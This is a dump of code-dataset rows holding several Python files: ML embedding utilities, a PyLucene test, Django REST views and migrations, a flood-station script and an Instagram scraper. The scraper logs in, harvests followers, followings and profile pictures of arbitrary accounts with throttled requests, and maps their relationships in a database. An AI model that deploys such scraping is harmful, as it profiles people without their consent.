hexsha stringlengths 40 40 | size int64 3 1.03M | ext stringclasses 10
values | lang stringclasses 1
value | max_stars_repo_path stringlengths 3 972 | max_stars_repo_name stringlengths 6 130 | max_stars_repo_head_hexsha stringlengths 40 78 | max_stars_repo_licenses listlengths 1 10 | max_stars_count int64 1 191k ⌀ | max_stars_repo_stars_event_min_datetime stringlengths 24 24 ⌀ | max_stars_repo_stars_event_max_datetime stringlengths 24 24 ⌀ | max_issues_repo_path stringlengths 3 972 | max_issues_repo_name stringlengths 6 130 | max_issues_repo_head_hexsha stringlengths 40 78 | max_issues_repo_licenses listlengths 1 10 | max_issues_count int64 1 116k ⌀ | max_issues_repo_issues_event_min_datetime stringlengths 24 24 ⌀ | max_issues_repo_issues_event_max_datetime stringlengths 24 24 ⌀ | max_forks_repo_path stringlengths 3 972 | max_forks_repo_name stringlengths 6 130 | max_forks_repo_head_hexsha stringlengths 40 78 | max_forks_repo_licenses listlengths 1 10 | max_forks_count int64 1 105k ⌀ | max_forks_repo_forks_event_min_datetime stringlengths 24 24 ⌀ | max_forks_repo_forks_event_max_datetime stringlengths 24 24 ⌀ | content stringlengths 3 1.03M | avg_line_length float64 1.13 941k | max_line_length int64 2 941k | alphanum_fraction float64 0 1 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
6f4481f21ecbfcd293b7ed64ac82be4d1f1615b5 | 10,703 | py | Python | src/utils.py | AayushGrover/text_style_transfer | 3b8f3fe3080f60be4c190c8e1d8140b71aa4c492 | [
"MIT"
] | 2 | 2020-05-13T04:36:01.000Z | 2020-05-13T04:36:10.000Z | src/utils.py | AayushGrover/text_style_transfer | 3b8f3fe3080f60be4c190c8e1d8140b71aa4c492 | [
"MIT"
] | null | null | null | src/utils.py | AayushGrover/text_style_transfer | 3b8f3fe3080f60be4c190c8e1d8140b71aa4c492 | [
"MIT"
] | null | null | null | import pandas as pd
import numpy as np
from sklearn.model_selection import train_test_split
import torch
from transformers import BertModel, BertTokenizer, GPT2LMHeadModel, GPT2Tokenizer, pipeline
from sentence_transformers import SentenceTransformer
import config
class BertUtil():
    """Wrap a pretrained BERT model and turn sentences into embeddings.

    Offers three embedding flavours, each for a single sentence and for a
    batch of sentences:
      * CLS embedding      - the [CLS] token's hidden state
      * word embeddings    - the full per-token hidden states
      * sentence embedding - sum of all token states after [CLS]

    BERT itself stays frozen (all forward passes run under ``torch.no_grad``);
    ``requires_grad`` is re-enabled on the returned tensors so that layers
    built on top of them can be fine-tuned.
    """

    def __init__(self, pretrained_weights=config.bert_pretrained_weights, max_length=config.max_length):
        self.pretrained_weights = pretrained_weights
        self.max_length = max_length  # sentences are padded/truncated to this many tokens
        self.model = BertModel.from_pretrained(self.pretrained_weights)
        self.model.to(config.device)
        self.model.eval()  # inference mode (disables dropout)
        self.tokenizer = BertTokenizer.from_pretrained(self.pretrained_weights)

    def _generate_input_ids(self, sentence):
        """Tokenize one sentence; returns ids of shape [1, max_length]."""
        encoded_dict = self.tokenizer.encode_plus(sentence, add_special_tokens=True, max_length=self.max_length, pad_to_max_length=True, return_tensors='pt')
        return encoded_dict['input_ids'].to(config.device)

    def _generate_batch_input_ids(self, batch_sentences):
        """Tokenize and stack sentences into ids of shape [batch_size, max_length].

        Shared helper: the three public batch methods previously duplicated
        this stacking loop verbatim.
        """
        return torch.stack([self._generate_input_ids(sentence).squeeze(0) for sentence in batch_sentences])

    @staticmethod
    def _finetunable(tensor):
        """Re-enable gradient tracking on a tensor created under no_grad."""
        tensor.requires_grad = True  # enable grad (finetuning) for the vector obtained from the BERT model
        return tensor

    def _generate_cls_embedding(self, input_ids):
        """[CLS] embedding for one sentence; shape [hidden_dim] (squeezed)."""
        with torch.no_grad():
            out = self.model(input_ids)[0]  # disable grad for BERT model
        cls_embedding = out[:, 0, :].squeeze(0).to(config.device)
        return self._finetunable(cls_embedding)

    def _generate_batch_cls_embeddings(self, batch_input_ids):
        """[CLS] embeddings for a batch; shape [batch_size, hidden_dim]."""
        with torch.no_grad():
            out = self.model(batch_input_ids)[0]  # disable grad for BERT model
        batch_cls_embeddings = out[:, 0, :].to(config.device)
        return self._finetunable(batch_cls_embeddings)

    def _generate_word_embeddings(self, input_ids):
        """Per-token embeddings for one sentence; shape [seq_len, hidden_dim]."""
        with torch.no_grad():
            out = self.model(input_ids)[0].squeeze(0).to(config.device)
        return self._finetunable(out)

    def _generate_batch_word_embeddings(self, batch_input_ids):
        """Per-token embeddings for a batch; shape [batch_size, seq_len, hidden_dim]."""
        with torch.no_grad():
            out = self.model(batch_input_ids)[0].to(config.device)
        return self._finetunable(out)

    def _generate_sentence_embedding(self, input_ids):
        """Summed token embeddings for one sentence; shape [hidden_dim]."""
        with torch.no_grad():
            out = self.model(input_ids)[0].squeeze(0).to(config.device)
            # sum all the word piece tokens in the seq (apart from the starting [CLS] token)
            out = torch.sum(out[1:], dim=0)
        return self._finetunable(out)

    def _generate_batch_sentence_embedding(self, batch_input_ids):
        """Summed token embeddings per sentence; shape [batch_size, hidden_dim]."""
        with torch.no_grad():
            out = self.model(batch_input_ids)[0].to(config.device)
            # sum all the word piece tokens in the seq (apart from the starting [CLS] token)
            out = torch.sum(out[:, 1:, :], dim=1)
        return self._finetunable(out)

    def generate_cls_embedding(self, sentence):
        """[CLS] embedding for a raw sentence string."""
        return self._generate_cls_embedding(self._generate_input_ids(sentence))

    def generate_word_embeddings(self, sentence):
        """Per-token embeddings for a raw sentence string."""
        return self._generate_word_embeddings(self._generate_input_ids(sentence))

    def generate_sentence_embedding(self, sentence):
        """Summed sentence embedding for a raw sentence string."""
        return self._generate_sentence_embedding(self._generate_input_ids(sentence))

    def generate_batch_cls_embeddings(self, batch_sentences):
        """[CLS] embeddings for a list of sentence strings."""
        return self._generate_batch_cls_embeddings(self._generate_batch_input_ids(batch_sentences))

    def generate_batch_word_embeddings(self, batch_sentences):
        """Per-token embeddings for a list of sentence strings."""
        return self._generate_batch_word_embeddings(self._generate_batch_input_ids(batch_sentences))

    def generate_batch_sentence_embedding(self, batch_sentences):
        """Summed sentence embeddings for a list of sentence strings."""
        return self._generate_batch_sentence_embedding(self._generate_batch_input_ids(batch_sentences))
class SentenceBERTUtil():
    """Wrap a SentenceTransformer model for single and batched sentence embeddings."""

    def __init__(self, pretrained_weights=config.sentence_bert_pretrained):
        self.pretrained_weights = pretrained_weights
        self.model = SentenceTransformer(self.pretrained_weights, device=config.device)
        self.model.eval()

    def generate_sentence_embedding(self, sentence):
        """Embedding for a single sentence string; shape [hidden_dim]."""
        assert(type(sentence) == str)
        with torch.no_grad():
            encoded = np.array(self.model.encode([sentence], show_progress_bar=False))
        embedding = torch.from_numpy(encoded).squeeze(0).to(config.device)
        # enable grad (finetuning) for the vector obtained from the Sentence-BERT model
        embedding.requires_grad = True
        return embedding

    def generate_batch_sentence_embedding(self, batch_sentences):
        """Embeddings for a list of sentences; shape [batch_size, hidden_dim]."""
        with torch.no_grad():
            encoded = np.array(self.model.encode(batch_sentences, show_progress_bar=False))
        batch_embeddings = torch.from_numpy(encoded).to(config.device)
        # enable grad (finetuning) for the vectors obtained from the Sentence-BERT model
        batch_embeddings.requires_grad = True
        return batch_embeddings
class SentimentAnalysisUtil():
    """Wrap the transformers sentiment-analysis pipeline and map its labels
    to one-hot vectors indexed by ``SENTIMENTS``."""

    def __init__(self, SENTIMENTS=config.SENTIMENTS):
        # leverages a fine-tuned model on sst2, which is a GLUE task.
        self.nlp = pipeline('sentiment-analysis')
        self.SENTIMENTS = SENTIMENTS

    def _get_sentiment_label(self, sentence):
        """Run the pipeline and return the predicted label string."""
        return self.nlp(sentence)[0]['label']

    def _get_sentiment_vector(self, sentiment_label):
        """One-hot encode a label; shape [len(self.SENTIMENTS)] = [2]."""
        one_hot = torch.zeros(len(self.SENTIMENTS), dtype=torch.float, device=config.device)
        one_hot[self.SENTIMENTS[sentiment_label]] = 1
        return one_hot

    def get_sentiment_vector(self, sentence):
        """One-hot sentiment vector for a single sentence."""
        return self._get_sentiment_vector(self._get_sentiment_label(sentence))

    def get_batch_sentiment_vectors(self, sentences):
        """Stack per-sentence one-hot vectors into [batch_size, 2]."""
        return torch.stack([self.get_sentiment_vector(sentence) for sentence in sentences])

    def get_sentiment_vector_from_label(self, sentiment_label):
        """One-hot encode an already-known label string."""
        return self._get_sentiment_vector(sentiment_label)

    def get_rand_target_sentiment(self):
        """One-hot vector for a randomly chosen sentiment label."""
        target_sentiment = np.random.choice(list(self.SENTIMENTS))
        return self._get_sentiment_vector(target_sentiment)

    def get_const_positive_sentiment(self):
        """One-hot vector for the constant 'POSITIVE' label."""
        positive_str = 'POSITIVE'
        assert(positive_str in self.SENTIMENTS)
        return self._get_sentiment_vector(positive_str)
class GPT2Util():
    """Wrap a pretrained GPT-2 LM head model and greedily decode text
    directly from precomputed input embeddings."""

    def __init__(self, pretrained_weights=config.gpt2_pretrained_weights, max_length=config.max_length):
        self.pretrained_weights = pretrained_weights
        self.max_length = max_length
        self.model = GPT2LMHeadModel.from_pretrained(self.pretrained_weights)
        self.model.to(config.device)
        self.model.eval()  # inference mode (disables dropout)
        self.tokenizer = GPT2Tokenizer.from_pretrained(self.pretrained_weights)

    def batch_generate_sentence(self, inputs_embeds):
        """Decode one string per row of ``inputs_embeds`` via argmax.

        inputs_embeds: embedding tensor fed straight into GPT-2
        (shape per the original comment: [batch_size, max_length, gpt2_dim]).
        Returns a list of decoded strings, one per batch row.
        """
        with torch.no_grad():
            predictions = self.model(inputs_embeds=inputs_embeds)[0]
        # shape(predictions) = [batch_size, max_length, gpt2_vocab_size]
        batch_predicted_indices = torch.argmax(predictions, dim=2)
        # argmax (greedy) decoding introduces a lot of repetition
        batch_seq = []
        for predicted_indices in batch_predicted_indices:
            # join per-token decodes instead of quadratic `s +=` concatenation
            batch_seq.append(''.join(
                self.tokenizer.decode([predicted_index])
                for predicted_index in predicted_indices))
        return batch_seq
def generate_train_test_split(path=config.path, train_path=config.train_path, test_path=config.test_path):
    """Split the review CSV at ``path`` 70/30 into train/test CSV files.

    Uses a fixed random_state so the split is reproducible.
    """
    data = pd.read_csv(path)
    review_train, review_test, sentiment_train, sentiment_test = train_test_split(
        data.review, data.sentiment, test_size=0.3, random_state=42)
    pd.DataFrame({'review': review_train, 'sentiment': sentiment_train}).to_csv(train_path, index=False)
    pd.DataFrame({'review': review_test, 'sentiment': sentiment_test}).to_csv(test_path, index=False)
if __name__ == '__main__':
    # Smoke test: instantiate the embedding helpers and print the shapes
    # produced for one sample sentence.
    bert_util = BertUtil()
    sentence_bert_util = SentenceBERTUtil()
    sentence = 'Jim Henson was a puppeteer'
    sentence_embedding = bert_util.generate_cls_embedding(sentence)
    print('bert_cls_embedding.shape', sentence_embedding.shape)
    sentence_embedding = bert_util.generate_sentence_embedding(sentence)
    print('bert_sentence_embedding.shape', sentence_embedding.shape)
    sentence_embedding = sentence_bert_util.generate_sentence_embedding(sentence)
    print('sentence_bert_embedding.shape', sentence_embedding.shape)
    # Further manual checks kept for reference (sentiment pipeline, GPT-2 decoding):
    # sentiment_analysis_util = SentimentAnalysisUtil()
    # sentence = 'Sad'
    # vec = sentiment_analysis_util.get_sentiment_vector(sentence)
    # print(vec)
    # inputs_embeds = torch.rand((config.batch_size, config.max_length, config.gpt2_dim)).to(config.device)
    # gpt2_util = GPT2Util()
    # print(gpt2_util.batch_generate_sentence(inputs_embeds))
# generate_train_test_split() | 45.739316 | 157 | 0.70924 |
e17bfdc7639273a12e99dfd7bdaf0320d766f472 | 2,960 | py | Python | test3/test_IndexDeletionPolicy.py | IreneZhou0129/PyLucene-assignment | 70916f1c8451c5dce5c5205915b25f214ffed2e4 | [
"Apache-2.0"
] | 5 | 2017-03-17T04:35:39.000Z | 2021-04-06T07:20:04.000Z | test3/test_IndexDeletionPolicy.py | IreneZhou0129/PyLucene-assignment | 70916f1c8451c5dce5c5205915b25f214ffed2e4 | [
"Apache-2.0"
] | null | null | null | test3/test_IndexDeletionPolicy.py | IreneZhou0129/PyLucene-assignment | 70916f1c8451c5dce5c5205915b25f214ffed2e4 | [
"Apache-2.0"
] | 1 | 2018-02-19T13:17:14.000Z | 2018-02-19T13:17:14.000Z | # ====================================================================
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ====================================================================
import sys, lucene, unittest
from PyLuceneTestCase import PyLuceneTestCase
from org.apache.lucene.analysis.core import WhitespaceAnalyzer
from org.apache.lucene.document import Document
from org.apache.lucene.index import DirectoryReader, IndexWriterConfig
from org.apache.pylucene.index import PythonIndexDeletionPolicy
class MyDeletionPolicy(PythonIndexDeletionPolicy):
    """Deletion policy that only records whether its callbacks were invoked."""

    # Flags inspected by IndexDeletionPolicyTestCase below.
    onInitCalled = False
    onCommitCalled = False

    def onInit(self, commits):
        # Invoked when the writer first opens the index.
        self.onInitCalled = True

    def onCommit(self, commits):
        # Invoked whenever a commit completes.
        self.onCommitCalled = True
class IndexDeletionPolicyTestCase(PyLuceneTestCase):
    """Checks that a custom IndexDeletionPolicy receives onInit/onCommit
    callbacks and that all commits survive across writer sessions."""

    def getConfig(self, analyzer):
        # Install the recording policy on the writer config so the test can
        # observe the callbacks; a fresh policy is created per writer session.
        self.policy = MyDeletionPolicy()
        config = IndexWriterConfig(analyzer)
        config.setIndexDeletionPolicy(self.policy)
        return config

    def testIndexDeletionPolicy(self):
        writer = self.getWriter()
        # no commits exist in the index yet
        self.assertTrue(self.policy.onInitCalled)
        # we haven't called commit yet
        self.assertFalse(self.policy.onCommitCalled)
        doc = Document()
        writer.addDocument(doc)
        writer.commit()
        # now we called commit
        self.assertTrue(self.policy.onCommitCalled)
        # external IR sees 1 commit:
        self.assertEqual(1, DirectoryReader.listCommits(self.directory).size())
        # commit again:
        writer.addDocument(doc)
        writer.commit()
        # external IR sees 2 commits:
        self.assertEqual(2, DirectoryReader.listCommits(self.directory).size())
        writer.close()
        # open same index, make sure both commits survived:
        writer = self.getWriter()
        self.assertTrue(self.policy.onInitCalled)
        self.assertFalse(self.policy.onCommitCalled)
        self.assertEqual(2, DirectoryReader.listCommits(self.directory).size())
        writer.close()
        # 3 from closing writer again
        self.assertEqual(3, DirectoryReader.listCommits(self.directory).size())
if __name__ == "__main__":
    # The JVM must be started before any Lucene classes are used.
    lucene.initVM()
    if '-loop' in sys.argv:
        # Stress mode: rerun the suite forever, swallowing failures so the
        # loop keeps going.
        sys.argv.remove('-loop')
        while True:
            try:
                unittest.main()
            except:
                pass
    else:
        unittest.main()
| 30.833333 | 79 | 0.650676 |
cfc347c790eec74d842994c89929b7c029c01129 | 414 | py | Python | backend/account_request/migrations/0009_accountrequest_end_date.py | adabutch/account_tracker | 2ae6e287266262557268f080cff821a736d6ec8b | [
"MIT"
] | null | null | null | backend/account_request/migrations/0009_accountrequest_end_date.py | adabutch/account_tracker | 2ae6e287266262557268f080cff821a736d6ec8b | [
"MIT"
] | 2 | 2020-02-11T15:45:51.000Z | 2020-07-17T16:47:06.000Z | backend/account_request/migrations/0009_accountrequest_end_date.py | adabutch/account_tracker | 2ae6e287266262557268f080cff821a736d6ec8b | [
"MIT"
] | null | null | null | # Generated by Django 2.1.5 on 2019-03-07 19:39
from django.db import migrations, models
class Migration(migrations.Migration):
    """Add the optional ``end_date`` field to the ``AccountRequest`` model."""

    dependencies = [
        ('account_request', '0008_accountrequest_comment'),
    ]

    operations = [
        migrations.AddField(
            model_name='accountrequest',
            name='end_date',
            # Nullable and blankable: existing rows simply get no end date.
            field=models.DateField(blank=True, null=True),
        ),
    ]
| 21.789474 | 59 | 0.618357 |
4924a919c4953d3478ded0d5e923cb0d90e77c0f | 1,028 | py | Python | Task1F.py | nicolerix/1A-Flood-risk-project | bd084a15abbd696813edb75fa824cfa8409e5c8f | [
"MIT"
] | null | null | null | Task1F.py | nicolerix/1A-Flood-risk-project | bd084a15abbd696813edb75fa824cfa8409e5c8f | [
"MIT"
] | null | null | null | Task1F.py | nicolerix/1A-Flood-risk-project | bd084a15abbd696813edb75fa824cfa8409e5c8f | [
"MIT"
] | null | null | null | #Identifying stations which have inconsitent data for typical high/low ranges (i).no data is available (ii).the typical high range is < typical low range reported
from cProfile import label
from floodsystem.stationdata import build_station_list
from floodsystem.station import inconsistent_typical_range_stations
from floodsystem.station import MonitoringStation
# build_station_list is a function and must be called; binding the function
# object itself (as the original did) would make stations.append() fail.
stations = build_station_list()

# Add a fake station to test consistency detection when the typical range is
# reported the wrong way round (high < low).
# Fixed: the original constructor call was missing commas after the coord=
# and typical_range= arguments, which is a SyntaxError.
fake_station = MonitoringStation(
    station_id='Fake Station',
    measure_id="hello",
    label='Fake Station',
    coord=(float(51), float(52)),
    typical_range=(float(52), float(12)),
    river="river",
    town="town")
stations.append(fake_station)

inconsistent_stations = inconsistent_typical_range_stations(stations)
inconsistent_station_names = []
for station in inconsistent_stations:
    inconsistent_station_names.append(station.name)
inconsistent_station_names = sorted(inconsistent_station_names)
print(inconsistent_station_names)
46b0ca1f64a5b5d98f6f9415d5f49408746cc2d1 | 4,512 | py | Python | profiles_api/views.py | manuelmillares/profiles-rest-api | e3662533daef8172614f81686d277431e5f38aa6 | [
"MIT"
] | null | null | null | profiles_api/views.py | manuelmillares/profiles-rest-api | e3662533daef8172614f81686d277431e5f38aa6 | [
"MIT"
] | 6 | 2021-03-19T11:46:22.000Z | 2022-02-10T14:13:35.000Z | profiles_api/views.py | manuelmillares/profiles-rest-api | e3662533daef8172614f81686d277431e5f38aa6 | [
"MIT"
] | null | null | null | from rest_framework.views import APIView
from rest_framework.response import Response
from rest_framework import status
from rest_framework import viewsets
from rest_framework.authentication import TokenAuthentication
from rest_framework import filters
from rest_framework.authtoken.views import ObtainAuthToken
from rest_framework.settings import api_settings
from rest_framework.permissions import IsAuthenticated
from profiles_api import serializers
from profiles_api import models
from profiles_api import permissions
class HelloApiView(APIView):
    """Test API View"""
    serializer_class = serializers.HelloSerializer

    def get(self, request, format=None):
        """Return a list of APIView features"""
        features = [
            "Uses HTTP methods as function (get, post, put, patch, delete)",
            "Is similar to a traditional Django View",
            "Gives you the most control over your application logic",
            "Is mapped manually to URLs"
        ]
        # NOTE(review): 'messagge' is misspelled but kept as-is — it is part
        # of the response payload clients may already depend on.
        return Response({'messagge': 'Hello', 'an_apiview': features})

    def post(self, request):
        """Create a Hello message with our name"""
        serializer = self.serializer_class(data=request.data)
        if not serializer.is_valid():
            return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
        name = serializer.validated_data.get('name')
        return Response({'message': f'Hello {name}'})

    def put(self, request, pk=None):
        """Handle updating an object"""
        return Response({'method': 'PUT'})

    def patch(self, request, pk=None):
        """Handle a partial update of an object"""
        return Response({'method': 'PATCH'})

    def delete(self, request, pk=None):
        """Delete an object"""
        return Response({'method': 'DELETE'})
class HelloViewSet(viewsets.ViewSet):
    """Test API ViewSet"""
    serializer_class = serializers.HelloSerializer

    def list(self, request):
        """Return a list of APIView features"""
        viewset_features = [
            'Uses action (list, create, retrieve, update, partial_update)',
            'Automatically maps to URLs using Routers',
            'Provides more functionality with less code'
        ]
        return Response({'message': 'Hello', 'a_viewset': viewset_features})

    def create(self, request):
        """Create a Hello message with our name"""
        serializer = self.serializer_class(data=request.data)
        if not serializer.is_valid():
            return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
        name = serializer.validated_data.get('name')
        return Response({'message': f'Hello {name}'})

    def retrieve(self, request, pk=None):
        """Handle getting an object by its ID"""
        return Response({'http_method': 'GET'})

    def update(self, request, pk=None):
        """Handle update an object"""
        return Response({'http_method': 'PUT'})

    def partial_update(self, request, pk=None):
        """Handle update part of an object"""
        return Response({'http_method': 'PATCH'})

    def destroy(self, request, pk=None):
        """Handle removing an object"""
        return Response({'http_method': 'DELETE'})
class UserProfileViewSet(viewsets.ModelViewSet):
    """Handle creating and updating profiles"""
    serializer_class = serializers.UserProfileSerializer
    # Fixed: the default Django model manager is ``objects``; ``object``
    # raises AttributeError as soon as this module is imported.
    queryset = models.UserProfile.objects.all()
    authentication_classes = (TokenAuthentication,)
    permission_classes = (permissions.UpdateOwnProfile,)
    filter_backends = (filters.SearchFilter,)
    search_fields = ('name', 'email',)
class UserLoginApiView(ObtainAuthToken):
    """Handle creating user authentication token"""
    # Use DRF's configured default renderers so this endpoint also shows up
    # in the browsable API.
    renderer_classes = api_settings.DEFAULT_RENDERER_CLASSES
class UserProfileFeedViewSet(viewsets.ModelViewSet):
    """Handle creating, reading and updating profile feed items"""
    authentication_classes = (TokenAuthentication,)
    serializer_class = serializers.ProfileFeedItemSerializer
    queryset = models.ProfileFeedItem.objects.all()
    # Requests must be authenticated AND may only modify the caller's own items.
    permission_classes = (
        permissions.UpdateOwnStatus,
        IsAuthenticated
    )

    def perform_create(self, serializer):
        """Sets the user profile to the logged in user"""
        # Attach the authenticated user so clients cannot post as someone else.
        serializer.save(user_profile=self.request.user)
| 33.924812 | 76 | 0.662677 |
96dcccfaa864ca4e78b71d76310a93910fd25d43 | 570 | py | Python | make_templates.py | kevinross/resume | 649f13b6ecaf53d0ce5b6d5e9c7fbd3f122580bd | [
"MIT"
] | null | null | null | make_templates.py | kevinross/resume | 649f13b6ecaf53d0ce5b6d5e9c7fbd3f122580bd | [
"MIT"
] | null | null | null | make_templates.py | kevinross/resume | 649f13b6ecaf53d0ce5b6d5e9c7fbd3f122580bd | [
"MIT"
] | null | null | null | import sys
# One section name per line; order defines the section1..sectionN placeholders.
sections = open('sections').read().splitlines()
def get_template(fm):
    """Assemble the full template for output format *fm*.

    Reads templates/<fm>/base and substitutes the placeholder tokens
    'header' and 'section1'..'section6' with the contents of the matching
    template files; section slots beyond those listed in the module-level
    ``sections`` are blanked.
    """
    def read(name):
        # Context manager closes the handle; the original leaked open files.
        with open('templates/%s/%s' % (fm, name)) as f:
            return f.read()

    d = {'header': read('header')}
    for i, v in enumerate(sections):
        d['section%d' % (i + 1)] = read(v)
    # Blank out any unused section placeholders (templates expect up to 6).
    for i in range(len(sections) + 1, 7):
        d['section%d' % i] = ''
    base = read('base')
    # Fixed: dict.iteritems() is Python 2 only; items() works on 2 and 3.
    for k, v in d.items():
        base = base.replace(k, v)
    return base
# Derive the format name from the requested output filename,
# e.g. 'default_tex.mustache' -> 'tex'.
t = sys.argv[1].replace('default_','').replace('.mustache','')
with open(sys.argv[1], 'w') as f:
    f.write(get_template(t))
| 30 | 67 | 0.610526 |
b7cd0efb1b9a260897f734f5c77c0a586043c58a | 17,730 | py | Python | betterStats.py | Dominik-CH/InstagramRelationshipAnalytics | 260d3d22aeac2b181c5aeb1139811c77192c9095 | [
"MIT"
] | 4 | 2020-08-12T18:16:17.000Z | 2022-02-27T17:08:19.000Z | betterStats.py | Dominik-CH/InstagramRelationshipAnalytics | 260d3d22aeac2b181c5aeb1139811c77192c9095 | [
"MIT"
] | null | null | null | betterStats.py | Dominik-CH/InstagramRelationshipAnalytics | 260d3d22aeac2b181c5aeb1139811c77192c9095 | [
"MIT"
] | null | null | null | #https://github.com/realsirjoe/instagram-scraper/
from igramscraper.exception import InstagramException
from igramscraper.instagram import Instagram
from time import sleep
import time
import os
import requests
import sqlite3
import sys
import random
from config import USERNAME, PASSWORD, MAINPASSWORD, MAINUSERNAME
from dataAnalysis import DataAnalysis
from PIL import Image, ImageDraw, ImageFilter
class ModifiedInsta(Instagram):
    def __init__(self):
        Instagram.__init__(self)
        # Path of the sqlite database this scraper writes to; set by
        # createDatabase()/setDbName() before any DB method is used.
        self.dbName = None
def downloadProfilePicture(self,url, name):
if not os.path.exists("pictures"):
os.makedirs("pictures")
response = requests.get(url)
# picture = open(name+".jpg","wb")
# picture.write(response.content)
# picture.close()
with open(os.path.join("pictures", name + ".jpg"), 'wb') as temp_file:
temp_file.write(response.content)
    def listMostRecentFollowers(self, maxInList=30, username=None, userID=None):  # shows the followers that most recently followed the user
        """Fetch a user's most recent followers and persist them in the DB.

        Exactly one of ``username``/``userID`` should be given. Followers are
        written via createDbEntryFollowers/matchFollowersToBeingFollowed and
        the user is then marked as scraped.
        """
        followers = []
        if (username == None) and (userID == None):
            print("Username oder ID müssen angegeben werden")
            return False
        if userID == None:
            try:
                # NOTE(review): uses the module-level ``instagram`` client
                # (defined elsewhere in this file), not self — verify.
                account = instagram.get_account(username)
                sleep(1)
                followers = instagram.get_followers(account.identifier, maxInList + 100, 100, delayed=True,
                                                    maxInList=maxInList)  # fetch 100 at a time with a random delay between requests
                userID = account.identifier
            except InstagramException as ex:
                if ex.args[0][-3:] == "403":
                    print("User is private. Skipping User")
                else:
                    # any non-403 scraper error aborts the whole run
                    print("Unknown error")
                    print(ex)
                    sys.exit(1)
            except Exception:
                print("Something went wrong")
        elif username == None:
            try:
                sleep(1)
                # the +100 is needed because otherwise the pageSize could be
                # smaller than the requested count
                followers = instagram.get_followers(userID, maxInList + 100, 100, delayed=True,
                                                    maxInList=maxInList)
            except InstagramException as ex:
                if ex.args[0][-3:] == "403":
                    print("User is private. Skipping User")
                else:
                    print("Unknown error")
                    print(ex)
                    sys.exit(1)
            except Exception:
                print("Something went wrong")
        try:
            # followers stays [] when scraping failed above, in which case the
            # ["accounts"] lookup raises and we land in the except below.
            self.createDbEntryFollowers(followers["accounts"])
            self.matchFollowersToBeingFollowed(userID, followers["accounts"])
            self.setScrapedTrue(userID)
        except Exception as e:
            print(e)
            print("Something went wrong")
            print(followers)
def setScrapedTrue(self,instaID):
conn = sqlite3.connect(self.dbName)
c = conn.cursor()
c.execute("""UPDATE userData SET scraped = ? WHERE instaID = ?""", (True,instaID,))
conn.commit()
conn.close()
    def listMostRecentFollowing(self, maxInList=30, username=None, userID=None):  # lists the accounts a user has followed most recently
        """Fetch the accounts a user most recently followed and persist them.

        Exactly one of ``username``/``userID`` should be given. Results are
        written via createDbEntryFollowers/matchFollowingsToBeingFollowed and
        the user is then marked as scraped.
        """
        followings = []
        if (username == None) and (userID == None):
            print("Username oder ID müssen angegeben werden")
            return False
        if userID == None:
            try:
                # NOTE(review): uses the module-level ``instagram`` client
                # (defined elsewhere in this file), not self — verify.
                account = instagram.get_account(username)
                sleep(1)
                followings = instagram.get_following(account.identifier, maxInList, 100, delayed=True,
                                                     maxInList=maxInList)  # fetch 100 at a time with a random delay between requests
                userID = account.identifier
            except InstagramException as ex:
                if ex.args[0][-3:] == "403":
                    print("User is private. Skipping User")
                else:
                    # any non-403 scraper error aborts the whole run
                    print("Unknown error")
                    print(ex)
                    sys.exit(1)
            except Exception:
                print("Something went wrong")
        elif username == None:
            try:
                sleep(1)
                followings = instagram.get_following(userID, maxInList, 100, delayed=True,
                                                     maxInList=maxInList)
            except InstagramException as ex:
                if ex.args[0][-3:] == "403":
                    print("User is private. Skipping User")
                else:
                    print("Unknown error")
                    print(ex)
                    sys.exit(1)
            except Exception:
                print("Something went wrong")
        try:
            # followings stays [] when scraping failed above, in which case
            # the ["accounts"] lookup raises and we land in the except below.
            self.createDbEntryFollowers(followings["accounts"])
            self.matchFollowingsToBeingFollowed(userID, followings["accounts"])
            self.setScrapedTrue(userID)
        except Exception as ex:
            print(ex)
            print("Something went wrong")
            print(followings)
def matchFollowersToBeingFollowed(self,beingFollowedID,FollowerList): #FollowerID ist Liste
conn = sqlite3.connect(self.dbName)
c = conn.cursor()
#Suchen welchen Key in userData beingFollowedID hat und dann schauen welchen Key FollowerID hat
beingFollowedKeyQuery = c.execute("""SELECT dbID from userData WHERE instaID = ?""", (beingFollowedID,))
beingFollowedKey = c.fetchone()[0]
print(beingFollowedKey)
for follower in FollowerList:
instaID = follower.identifier
followerQuery = c.execute("""SELECT dbID from userData WHERE instaID = ?""", (instaID,)) #extrahiert die Keys der Db
followerQueryKey = c.fetchone()[0]
matchingQuery = c.execute("""insert into whoFollowsWho (beingFollowed, follower) values (?,?)""", (beingFollowedKey,followerQueryKey,))
conn.commit()
conn.close()
def matchFollowingsToBeingFollowed(self,FollowingID,beingFollowedList): #Wem der aktuelle User gerade folgt ist in der Liste
conn = sqlite3.connect(self.dbName)
c = conn.cursor()
#Suchen welchen Key in userData beingFollowedID hat und dann schauen welchen Key FollowerID hat
followingKeyQuery = c.execute("""SELECT dbID from userData WHERE instaID = ?""", (FollowingID,))
followingKey = c.fetchone()[0]
for follower in beingFollowedList:
instaID = follower.identifier
beingFollowedQuery = c.execute("""SELECT dbID from userData WHERE instaID = ?""", (instaID,)) #extrahiert die Keys der Db
beingFollowedKey = c.fetchone()[0]
matchingQuery = c.execute("""insert into whoFollowsWho (beingFollowed, follower) values (?,?)""",(beingFollowedKey, followingKey,))
conn.commit()
conn.close()
def getMainUserData(self,username): #Wichtig um einen User zu haben der im Mittelpunkt von allem steht
account = instagram.get_account(username)
self.createDbEntryFollowers([account]) #Muss liste sein cause of how createDbEntry works
return account.identifier #Rückgabe damit man die ID hat um die der anderen fkt zu geben
def createDbEntryFollowers(self,followersList): #Soll fungieren als Fkt direkt nachdem die Follower des Main Users extrahiert wurden. Die Daten werden in die Tabelle eingelesen damit sie einen KEy haben und im nächsten Schritt in WhoFollows who eingesetzt werden können
print("In DB Entry Followers")
conn = sqlite3.connect(self.dbName)
c = conn.cursor()
followersIntoDB = []
for following in followersList:
profilPic = following.profile_pic_url
fullName = following.full_name
followerID = following.identifier
followerUsername = following.username
followerIsPrivate = following.is_private
infoFollower = (followerID,followerUsername,fullName,profilPic,followerIsPrivate,False,False,False,False)
